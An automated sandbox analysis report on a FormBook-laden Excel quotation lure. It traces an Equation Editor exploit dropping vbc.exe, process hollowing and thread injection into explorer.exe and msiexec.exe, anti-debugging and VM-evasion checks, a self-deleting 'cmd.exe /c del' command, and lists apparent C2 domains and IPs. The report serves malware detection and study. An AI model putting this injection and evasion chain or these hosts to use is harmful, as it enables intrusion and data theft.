Source: C:\Users\Public\vbc.exe Code function: 5_1_00418710 NtClose, 5_1_00418710
Source: C:\Users\Public\vbc.exe Code function: 5_1_004187C0 NtAllocateVirtualMemory, 5_1_004187C0
Source: C:\Users\Public\vbc.exe Code function: 5_1_004187BC NtAllocateVirtualMemory, 5_1_004187BC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F00C4 NtCreateFile,LdrInitializeThunk, 7_2_024F00C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F07AC NtCreateMutant,LdrInitializeThunk, 7_2_024F07AC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_024EFAE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFB50 NtCreateKey,LdrInitializeThunk, 7_2_024EFB50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_024EFB68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_024EFBB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EF900 NtReadFile,LdrInitializeThunk, 7_2_024EF900
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EF9F0 NtClose,LdrInitializeThunk, 7_2_024EF9F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_024EFED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFFB4 NtCreateSection,LdrInitializeThunk, 7_2_024EFFB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_024EFC60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_024EFDC0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFD8C NtDelayExecution,LdrInitializeThunk, 7_2_024EFD8C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F0048 NtProtectVirtualMemory, 7_2_024F0048
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F0060 NtQuerySection, 7_2_024F0060
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F0078 NtResumeThread, 7_2_024F0078
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F10D0 NtOpenProcessToken, 7_2_024F10D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F1148 NtOpenThread, 7_2_024F1148
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F010C NtOpenDirectoryObject, 7_2_024F010C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F01D4 NtSetValueKey, 7_2_024F01D4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFA50 NtEnumerateValueKey, 7_2_024EFA50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFA20 NtQueryInformationFile, 7_2_024EFA20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFAD0 NtAllocateVirtualMemory, 7_2_024EFAD0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFAB8 NtQueryValueKey, 7_2_024EFAB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFBE8 NtQueryVirtualMemory, 7_2_024EFBE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EF8CC NtWaitForSingleObject, 7_2_024EF8CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EF938 NtWriteFile, 7_2_024EF938
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F1930 NtSetContextThread, 7_2_024F1930
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFE24 NtWriteVirtualMemory, 7_2_024EFE24
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFEA0 NtReadVirtualMemory, 7_2_024EFEA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFF34 NtQueueApcThread, 7_2_024EFF34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFFFC NtCreateProcessEx, 7_2_024EFFFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFC48 NtSetInformationFile, 7_2_024EFC48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F0C40 NtGetContextThread, 7_2_024F0C40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFC30 NtOpenProcess, 7_2_024EFC30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFC90 NtUnmapViewOfSection, 7_2_024EFC90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024EFD5C NtEnumerateKey, 7_2_024EFD5C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024F1D80 NtSuspendThread, 7_2_024F1D80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000A85E0 NtCreateFile, 7_2_000A85E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000A8690 NtReadFile, 7_2_000A8690
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000A8710 NtClose, 7_2_000A8710
PE file contains strange resources
Source: winlogon[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Quotation Request - Alligator Pty Ltd.xlsx ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Quotation Request - Alligator Pty Ltd.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF131.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/24@4/4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar, 4_2_00402012
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_0040411B
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.541236797.00000000002DA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.541224912.00000000002C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.543131864.00000000025C0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.481808621.00000000004A0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.542128053.0000000000910000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483202698.0000000000600000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.541453296.0000000000790000.00000040.00000001.sdmp, msiexec.exe

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001C365 push ecx; ret 4_2_1001C378
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B822 push eax; ret 5_2_0041B828
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B82B push eax; ret 5_2_0041B892
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B88C push eax; ret 5_2_0041B892
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
Source: C:\Users\Public\vbc.exe Code function: 5_2_007ADFA1 push ecx; ret 5_2_007ADFB4
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B822 push eax; ret 5_1_0041B828
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B82B push eax; ret 5_1_0041B892
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B88C push eax; ret 5_1_0041B892
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B7D5 push eax; ret 5_1_0041B828
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024FDFA1 push ecx; ret 7_2_024FDFB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000AB7D5 push eax; ret 7_2_000AB828
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000AB82B push eax; ret 7_2_000AB892
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000AB822 push eax; ret 7_2_000AB828
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000AB88C push eax; ret 7_2_000AB892
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_00405C49

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nspBFD8.tmp\uoqeqjqp.dll Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1156 Thread sleep time: -180000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_022166E8 rdtsc 0_2_022166E8
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_00405250
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C22 FindFirstFileA,FindClose, 4_2_00405C22
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402630 FindFirstFileA, 4_2_00402630
Source: explorer.exe, 00000006.00000000.501680336.000000000456F000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.501680336.000000000456F000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.483703319.00000000008B4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.527699949.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.493942706.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.501732791.000000000457A000.00000004.00000001.sdmp Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001AD6A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_1001AD6A
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001AD6A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_1001AD6A
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_00405C49
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 4_2_10007CE0 SetEnhMetaFileBits,SetWinMetaFileBits,GetDC,CreateDIBitmap,ReleaseDC,GetProcessHeap,HeapFree, 4_2_10007CE0
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_022166E8 rdtsc 0_2_022166E8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018EA3B mov eax, dword ptr fs:[00000030h] 4_2_0018EA3B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018EA7A mov eax, dword ptr fs:[00000030h] 4_2_0018EA7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018EAB8 mov eax, dword ptr fs:[00000030h] 4_2_0018EAB8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018E776 mov eax, dword ptr fs:[00000030h] 4_2_0018E776
Source: C:\Users\Public\vbc.exe Code function: 4_2_0018E98A mov eax, dword ptr fs:[00000030h] 4_2_0018E98A
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B26F8 mov eax, dword ptr fs:[00000030h] 5_2_007B26F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025026F8 mov eax, dword ptr fs:[00000030h] 7_2_025026F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B40 LdrLoadDll, 5_2_00409B40
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001CB66 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_1001CB66

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.subsoilcorp.com
Source: C:\Windows\explorer.exe Domain query: www.travelgleam.com
Source: C:\Windows\explorer.exe Domain query: www.ll1ysq.biz
Source: C:\Windows\explorer.exe Network Connect: 162.210.195.97 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 610000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 4_2_10019C0D cpuid 4_2_10019C0D
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 4_2_0040594D

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532880 Sample: Quotation Request - Alligat... Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 42 www.sdffzc.com 2->42 44 minisite.alibaba.com.gds.alibabadns.com 2->44 46 minisite.alibaba.com 2->46 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 11 other signatures 2->62 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 33 29 2->16         started        signatures3 process4 dnsIp5 54 107.173.191.75, 49165, 80 AS-COLOCROSSINGUS United States 11->54 36 C:\Users\user\AppData\...\winlogon[1].exe, PE32 11->36 dropped 38 C:\Users\Public\vbc.exe, PE32 11->38 dropped 78 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->78 18 vbc.exe 17 11->18         started        40 ~$Quotation Reques...igator Pty Ltd.xlsx, data 16->40 dropped file6 signatures7 process8 file9 34 C:\Users\user\AppData\Local\...\uoqeqjqp.dll, PE32 18->34 dropped 64 Tries to detect virtualization through RDTSC time measurements 18->64 66 Injects a PE file into a foreign processes 18->66 22 vbc.exe 18->22         started        signatures10 process11 signatures12 68 Modifies the context of a thread in another process (thread injection) 22->68 70 Maps a DLL or memory area into another process 22->70 72 Sample uses process hollowing technique 22->72 74 Queues an APC in another process (thread injection) 22->74 25 explorer.exe 22->25 